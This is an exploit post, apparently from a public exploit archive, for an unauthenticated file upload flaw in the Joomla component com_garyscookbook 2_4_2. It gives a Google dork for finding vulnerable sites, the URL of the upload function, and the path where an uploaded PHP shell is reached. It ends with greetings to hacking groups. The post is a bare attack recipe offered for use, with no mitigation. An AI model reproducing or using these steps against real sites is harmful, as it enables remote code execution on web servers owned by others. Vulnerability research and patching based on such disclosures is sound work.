facebook facebook twitter rss

joomla com_garyscookbook file upload

Author: Over-X , Published: 08-11-2012
# Exploit Title:  joomla com_garyscookbook file upload
# Author: Over-X
# email: j1a@hotmail.de
# Vendor or Software Link: www.joomla.it
# Version: 2_4_2
# Google dork: "inurl:com_garyscookbook"
# Tested on: win Xp


-------------------------------------------------------------------------------

poc:
----


localhost/path/index.php?option=com_garyscookbook&func=newItem

upload shell php and go 2 :
--------------------------

localhost/path/components/com_garyscookbook/img_pictures/shell.php



--------------------------------------------------------------------------------
Gre: Sec4ever.com & Damane2011 & Invectus & Kha&mix & ked Ans & Black_Specter
ms_dz & indoushka & jago-dz & L3b r1z & b0x

Like us on Facebook :